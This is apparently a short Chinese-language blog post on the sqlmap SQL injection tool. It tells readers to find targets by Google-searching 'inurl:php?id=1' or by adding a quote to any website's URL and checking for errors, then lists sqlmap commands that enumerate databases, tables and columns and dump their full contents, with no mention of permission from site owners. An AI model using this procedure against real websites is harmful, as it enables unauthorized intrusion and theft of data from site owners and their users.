程式語言:Python 2.6.x or 2.7.x
官方 GitHub
官方指令表(善用 google 翻譯)
功能:SQL injection test
- 工具:sqlmap
官方 GitHub
官方指令表(善用 google 翻譯)
功能:SQL injection test
簡易尋找目標
- google 搜尋 inurl:php?id=1
- 任意網頁,在網址後加上 ' ,看是否有錯誤訊息
- 有錯誤訊息,即可嘗試
簡易測試方法
// 列出資料庫 python2.7 sqlmap.py -u "網址" --dbs // 用前一個指令找到的資料庫,找其內部的 tables,可用逗號分隔 python2.7 sqlmap.py -u "網址" -D "資料庫" --tables // 用前一個指令找到的 tableName,找其內部的 columns python2.7 sqlmap.py -u "網址" -D "資料庫" -T "tableName" --columns // 將前一個指令找到的 columnName 的資料全部下載 python2.7 sqlmap.py -u "網址" -D "資料庫" -T "tableName" -C "columnName" --dump // -D 可多個尋找,將數據庫名稱以逗號分隔 // -T 可多個尋找,將 table 名稱以逗號分隔 // -C 可多個尋找,將 column 名稱以逗號分隔 // 尋找任意名字,也可用逗號分隔,表示 OR python2.7 sqlmap.py -u "網址" --search -D "關鍵字" -T "關鍵字" -C "關鍵字"
留言
張貼留言